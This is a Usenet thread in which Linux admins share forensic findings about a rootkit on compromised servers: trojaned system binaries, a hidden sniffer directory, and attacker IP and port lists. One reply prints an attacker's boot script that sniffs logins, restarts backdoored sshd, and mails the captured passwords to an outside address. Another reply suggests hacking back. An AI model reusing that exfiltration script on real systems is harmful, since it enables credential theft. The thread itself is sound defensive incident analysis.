looks like a worm to me.
Fredrik Bergström
Some days ago when I logged into one of my servers, just to make some
small adjustments to a database. I to my surprise found that I could
not login as root.
Strange I thought, and called my friend who also have root access, but
he had not changed the root password.
A cold feeling swept down my back, and lots of C code scrolled by my
eyes. This server was set up for reinstallation some weeks ago, but I
had not come around doing that. And it was a standard Slackware 7
installation with about 11 months of playing around with different
server softwares.
I ran a 'ps ax' but found nothing special, or wait a minute, the list
was quite short for this machine. Its usually lots of processes going.
I went into /etc and after running "ls -ltr" (large, time, reverse) I
found that the files host, ftpaccess, ftpusers, shadow, inetd.conf was
changed on the same date and time. A file rc.d/rc.sysinit was allso
added.
Since I was not root, I could not find anything more because all those
files was root.root . I waited some hours, and then I got cold feet.
I took the bus to the server room where the server is located, and
went
'linux init=/bin/bash rw' on lilo's ass. An 'passwd' and 'sync' later
and
I had a new root password.
Okay, looking around the system now I found that the commands ps, ls,
netstat, named, inetd, crond and a couple more was modified.
With the ps out of order I ran a 'cat /proc/*/stat' to see what
processes the machine was running. The commands 'snif' and 'ras2xm'
looked a bit interesting, and so I hurried to shut them down.
Back to the /etc/rc.d/rc.sysinit file, this file did not have the +x
flag set, and therefore slackware did not run it on boot.
Good thing, this file contained one row '/usr/bin/sourcemask'.
# cat /usr/bin/sourcemask
cd /usr/man/man1/".. "/.dir
./snif >chipsul &
/usr/bin/ras2xm -p 5139 -q
The sourcemask script starts the sniffer and the other ( possible
scanning tool? ) I could not find any info anywhere about those
programs or their uses, and I dare not to run them outside a
controlled environment.
To continue, now I had found all the stuff. Or so I thought. The
/usr/man/man1/".. "/.dir did contain tools to backdoor and
bufferoverflow sshd, bind and wuftpd servers and other hacking stuff.
I searched a bit on the net, and found a nice thought about running
'find / -nouser -o -nogroup' to find suspicious files on the server.
And of it went, and it found a couple of files and one directory in
/dev.
/dev/ttyp/ contained two directories '.backup' and 'other'. .backup
had my
old version of ps, ls, inetd, inetd.conf, named and netstat. And the
'other' directory contained two scripts that seemed to configure the
appearance of the hacked ls, ps and netstat commands.
The fun in this was that /dev also contained some other files with
some fun information inside:
-----------------------------------
server:/dev# cat hdbp
2 sh
2 in.telnetd
3 rpc.rusers
3 mdump
3 chgrp
3 cron
server:/dev# cat hdaq
3 45050
3 31083
server:/dev# cat hdap
ttyp
rpc.rusers
hdaq
hdbp
hdap
lispmtopgm.2.gz
ldapdelete.2.gz
mdump
server:/dev# cat xmx
3 in.rexedcs
3 defauths dcs
3 defauths
3 rdcmound
3 rdcbac
3 w
3 s
3 psy
3 bot
3 scan
3 wus
3 klog
3 create
3 crush
3 snif
3 ras2xm
3 sourcemask
server:/dev# cat xdta
1 194.102.123.240
1 194.102.123.241
1 194.102.123.239
1 194.102.123.238
1 194.102.123.237
1 hobbiton.org
2 hobbiton.org
3 59311
3 59388
3 31471
3 51211
3 51212
3 51213
3 51214
4 6660
4 6666
4 6667
4 6668
4 6669
4 7000
4 31337
4 5555
4 31336
server:/dev#
----------------------------
The IP 194.102.123.237-241 is a Computer Club (Internet Cafe like) in
Timisoara, Romania.
Another fun detail was that with the hacker tools came two core-dump
files containing the ENV of the conputers they where run on.
i686 ./scan 148 111 243 USERNAME=root ENV=/root/.bashrc HISTSIZE=1000
HOSTNAME=pirates.crsc.k12.ar.us LOGNAME=root HISTFILESIZE=1000
SSH_TTY=/dev/pts/0 MAIL=/var/spool/mail/root TERM=xterm HOSTTYPE=i386
PATH=/usr/bin:/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin HOME=/root
INPUTRC=/etc/inputrc SHELL=/bin/bash USER=root
SSH_CLIENT=194.102.224.92 1380 5139 OSTYPE=Linux SHLVL=2 _=./scan
i686 ./ben 128.97.6.184 LESSOPEN=|/usr/bin/lesspipe.sh %s
USERNAME=root ENV=/root/.bashrc HISTSIZE=1000 HOSTNAME=jun-zhi.com.tw
LOGNAME=root SSH_TTY=/dev/pts/4 MAIL=/var/spool/mail/root TERM=xterm
HOSTTYPE=i386
PATH=/usr/kerberos/bin:/usr/bin:/bin:/usr/bin:/usr/X11R6/bin:/root/bin
KDEDIR=/usr HOME=/root INPUTRC=/etc/inputrc SHELL=/bin/bash USER=root
QTDIR=/usr/lib/qt-2.1.0 LANG=en_US SSH_CLIENT=194.102.123.231 1189 3
OSTYPE=Linux _=./ben SHLVL=2
The IP 194.102.224.92 is located somewhere in BOTOSANI, Romania.
Summary:
Okay. I don't have a chance framing someone for this. And I don't
know if I want to. I have had some fun days playing and searching all
over the net for clues. And thought that I would be fun to write a
(long) posting to this newsgroup about it.
I would love some input from you all about this, I could not find any
info about the files. I found some old usenet postings on Japanese
about the file ras2xm but thats all. Is this a worm or a hacker?
Regards, Fredrik Bergström.
Kasper Dupont
>
[snip]
> Is this a worm or a hacker?
I think this sounds like a cracker.
If you want to verify what it really is you should find out
what the new daemons does. If it is a worm they will probably
be trying to attack other computers. In either case they
might also create some backdoor to your system, so don't
connect it to the internet before you have cleaned the system,
and don't connect them with any other computer of any
importance.
--
Kasper Dupont
Luke Vogel
>Is this a worm or a hacker?
> Regards, Fredrik Bergström.
Ni ce bit of forensics there Fredrik ... I'd say it was a manual hacker
.. none of the files and locations that you described were consistent
with worms that I am familiar with.
If you wanted a bit more info on the fiels and what they do, you could
always run "strings" over them. This often gives a few clues as to the
purpose of the file.
Other than that, when you re-install, make sure you do the job properly,
including hardening and firewalling the box ...
--
Regards
Luke
------
Q: What does FAQ stand for?
A: We are Frequently Asked this Question, and we have no idea.
------
C.O.L.S FAQ - http://www.linuxsecurity.com/docs/colsfaq.html
------
PLEASE NOTE: Spamgard (tm) installed.
mailto:lukeN...@bell-bird.com.au (remove NOSPAM ... obviously:)
------
Michael Erskine
> Hello.
It may be a worm alright but is is most certainly a human one...
I *scanned* but did not read in detail your comments.
> server:/dev# cat xdta
> 1 194.102.123.240
> 1 194.102.123.241
> 1 194.102.123.239
> 1 194.102.123.238
> 1 194.102.123.237
> 1 hobbiton.org
> 2 hobbiton.org
> 3 59311
> 3 59388
> 3 31471
> 3 51211
> 3 51212
> 3 51213
> 3 51214
> 4 6660
> 4 6666
> 4 6667
> 4 6668
> 4 6669
> 4 7000
> 4 31337
> 4 5555
> 4 31336
The above will help you to start the process of *telephoning*
sysadmins and
reporting the extent of *their* compromise. Interesting list of
ports.
> Okay. I don't have a chance framing someone for this. And I don't
> know if I want to. I have had some fun days playing and searching all
> over the net for clues. And thought that I would be fun to write a
> (long) posting to this newsgroup about it.
When you discover one of these, if you *really* want to go after the
person who done it... Drop a sniffer beside the host and then reboot
it. He'll come in to see what happened. All you will get is a line
on another compromised host but you (with the help of another
concerned admin) can leverage that into taking from the cracker, what
he took from you... your privacy.
Mind you that his *sniffer dump* has a bunch of information in it
about his connections to your host, unless the sniffer is set to
ignore the IP's he is using. Possible given the above, but unlikely in
view of the fact he changed the root password. You *really* should
contact the admin(s) at the IP's you have to help to clean up
things...
This is a cracker beyond any doubt at all. One that doesn't mind
giving away his hand by changing the root password is not
particularily adept. From the list of ports, he is likely scanning for
compromised winderz boxes.
Reinstall. Keep up with your patches.
-m-
Adam Ruth
Dec 26). Many of the files you listed were present on my system. I
was able to clean everything, but if you would like any information I
would be happy to share.
Adam Ruth
fredrik....@cetevo.com (Fredrik Bergstr?) wrote in message news:<3c21d67b...@news.vegasys.net>...
Luke Vogel
>
> I was able to clean everything,
How do you know you got everything?
Alexander Loose
I read your article about about what you found out about the worm. I
had a very similar attack on 2 of my Systems. I hope I'll find out
some more information on how this all will work. Therefore I have a
question. Do you use the dyndns.org service on your machine ? Or, do
you connect your box through an uplink to the german telekom or
t-online ?
fredrik....@cetevo.com (Fredrik Bergstr?) wrote in message news:<3c21d67b...@news.vegasys.net>...
> I would love some input from you all about this, I could not find any
> info about the files. I found some old usenet postings on Japanese
> about the file ras2xm but thats all. Is this a worm or a hacker?
I think ist's a worm root-kit, that many skript kiddies used to create
their own trojan horse or worm to "hack" a unix or unix like system.
> Regards, Fredrik Bergström.
with best regards, Alex Loose
Fredrik Bergström
When did you have this attacks? Recently?
I would like some of the files with IP numbers so that I could dig a
bit deeper, send them in a private mail to me if you want to share
them.
Nope, I don't use any dyndns service of like and I have my uplink
through a Swedish company (where I work).
Are you suspicious of dyndns or t-online?
The attack that I had seemed to have originated through an old sshd
and there was capabilities in the rootkit to use wuftpd also.
Regards, Fredrik.
a...@loonet.de (Alexander Loose) wrote in message news:<88ebcd22.0201...@posting.google.com>...
Michael Chan
script is found :
#!/bin/sh
# Begin #
cd /usr/man/man1/".. "
./asus >chipsul &
/usr/sbin/initdl -p 45111 -q -f /etc/r.konfig>/dev/null
/usr/bin/initdl -p 45111 -q -f /etc/r.konfig>/dev/null
killall -HUP sshd1
/usr/local/sbin/sshd -p 22
/usr/sbin/sshd -p 22
# Log #
cd /usr/man/man1/".. "
./see chipsul >> log.txt
cat /var/run/.sn.so >> log.txt
cat log.txt | mail -s "Log" l...@arad-online.org
rm -rf log.txt
# End #
# Almost #
# http://arad-online.org/ #
This binary "./asus >chipsul &" was snooping every login and password
of the system and connecting back to an IP
12-230-106-13.client.attbi.com (12.230.106.13).
I am sure this guy hacked into my system from wu-ftpd as i notice its
existence after he removed my /etc/ftpaccess file.
As other hacks, programs "ps, ls, tcpd, sshd" were modified and a list
of programs were ported to the directory /usr/man/man1/".. "
Anyone would like to discuss this kind of hack can contact me for more
details as I found this guy ported many programs on my server.
Regards,
Michael
fredrik....@cetevo.com (=?ISO-8859-1?Q?Fredrik_Bergstr=F6m?=) wrote in message news:<c0dbdad.02012...@posting.google.com>...
Simon Green
Not to put too fine a point on it--
Rather than worry too much about the details of the hack, you should just
patch wu-ftpd, or use a different one instead. Getting hacked twice exactly
the same way is a good hint that you have a vulnerable version.
Oh, and don't try to fix the system, reformat and install from scratch.
Simon